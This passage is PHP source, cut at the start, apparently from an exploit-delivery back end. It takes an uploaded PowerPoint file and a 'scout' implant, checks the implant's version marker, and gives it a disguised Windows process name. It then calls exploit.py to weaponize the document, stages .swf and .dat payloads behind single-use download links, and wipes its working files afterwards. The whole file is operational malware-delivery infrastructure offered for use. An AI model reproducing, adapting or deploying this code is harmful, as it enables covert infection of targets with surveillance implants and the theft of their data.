"CCC.exe", "P\x00o\x00w\x00e\x00r\x00D\x00V\x00D\x00" => "PDVD9Serv.exe", "H\x00D\x00 \x00A\x00u\x00d\x00i\x00o\x00" => "RtDCpl.exe", "O\x00u\x00t\x00-\x00o\x00f\x00-\x00B\x00r\x00o\x00w\x00s\x00e\x00r\x00" => "sllauncher.exe", "L\x00i\x00v\x00e\x00 \x00I\x00D\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00" => "WLIDSVCM.exe", ); function getScoutName($scout_full_path) { global $scout_names; $scout_buff = file_get_contents($scout_full_path); if (!strpos($scout_buff, "Iaskdj2AS")) die("Bad scout version\n"); foreach ($scout_names as $key => $value) if (strpos($scout_buff, $key)) return $value; return ""; } function GeraHash($qtd){ //Under the string $Caracteres you write all the characters you want to be used to randomly generate the code. $Caracteres = 'abcdefghijklmnopqrstuvwxyz0123456789'; $QuantidadeCaracteres = strlen($Caracteres); $QuantidadeCaracteres--; $Hash=NULL; for($x=1;$x<=$qtd;$x++){ $Posicao = rand(0,$QuantidadeCaracteres); $Hash .= substr($Caracteres,$Posicao,1); } return $Hash; } function getName($path, $suffix) { $results = array(); $handler = opendir($path); while ($file = readdir($handler)) { if(strstr($file, $suffix)) { return $file; } } } $rand_directory = GeraHash(8); #if(!isset($_FILES['modified']) || !isset($_FILES['original']) || !isset($_FILES['stage1']) || !isset($_FILES['stage2'])) die('Files not uploaded'); #if(!isset($_POST['directory'])) die('Directory not specified'); if(!mkdir('../files/'.$rand_directory)) die('Unable to create directory'); if(!mkdir('../files/'.$rand_directory."/cnt")) die('Unable to create directory'); $cwd = getcwd(); chdir("/var/www/html/admin/2013-003-PowerPoint"); move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-003-PowerPoint/original.ppsx"); move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-003-PowerPoint/agent.exe"); $urlbase = 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'; if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") { $scout_name = "demo.exe"; } else { $scout_name = getScoutName("/var/www/html/admin/2013-003-PowerPoint/agent.exe"); } if ($scout_name == "") die('Unable to get scout name! :('); mkdir("/tmp/$rand_directory"); copy("original.ppsx", $_FILES['original']['name']); system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" > /dev/null 2>&1"); if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") { system("python26 exploit_demo.py payload:http $urlbase sendtotarget.zip original.ppsx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" DEMO > /tmp/py.log 2>&1"); } else { system("python26 exploit.py payload:http $urlbase sendtotarget.zip original.ppsx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" > /tmp/py.log 2>&1"); } #mkdir("/tmp/$rand_directory"); #copy("original.ppsx", "\"".$_FILES['original']['name']."\""); #system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1"); system("unzip -d /tmp/$rand_directory server.zip >> /tmp/py.log 2>&1"); #system("unzip -d /tmp/$rand_directory sendtotarget.zip >> /tmp/py.log 2>&1"); chdir($cwd); $directory = '../files/'.$rand_directory; $conf = array( 'modified' => 'cnt/modified.zip', 'original' => 'cnt/original.zip', 'browsercheck' => true, 'content-type' => 'application/msword', 'hits' => 1, ); $target_zip_name = str_replace(".ppsx", ".zip", $_FILES['original']['name']); file_put_contents("$directory/$target_zip_name", '$conf = '.var_export($conf, true).';'); copy("/var/www/html/admin/2013-003-PowerPoint/sendtotarget.zip", "$directory/cnt/modified.zip"); copy("/tmp/$rand_directory/original.zip", "$directory/cnt/original.zip"); #copy("/var/www/html/admin/2013-003-PowerPoint/original.ppsx", "$directory/cnt/original.ppsx"); $conf = array( 'modified' => 'cnt/stage1', 'hits' => 1, ); $stage1_name = getName("/tmp/$rand_directory/", '.swf'); file_put_contents("$directory/".$stage1_name, '$conf = '.var_export($conf, true).';'); copy("/tmp/$rand_directory/$stage1_name", "$directory/cnt/stage1"); $conf = array( 'modified' => 'cnt/stage2', 'hits' => 1, ); $stage2_name = getName("/tmp/$rand_directory/", '.dat'); file_put_contents("$directory/".$stage2_name, '$conf = '.var_export($conf, true).';'); copy("/tmp/$rand_directory/$stage2_name", "$directory/cnt/stage2"); #echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$_FILES['original']['name']; echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$target_zip_name; system("rm -rf /var/www/html/admin/2013-003-PowerPoint/tmp/*"); system("rm -rf /tmp/$rand_directory"); system("rm -f /var/www/html/admin/2013-003-PowerPoint/*swf"); system("rm -f /var/www/html/admin/2013-003-PowerPoint/*exe"); system("rm -f /var/www/html/admin/2013-003-PowerPoint/*dat"); system("rm -f /var/www/html/admin/2013-003-PowerPoint/*ppsx"); system("rm -f /var/www/html/admin/2013-003-PowerPoint/*zip"); ?> .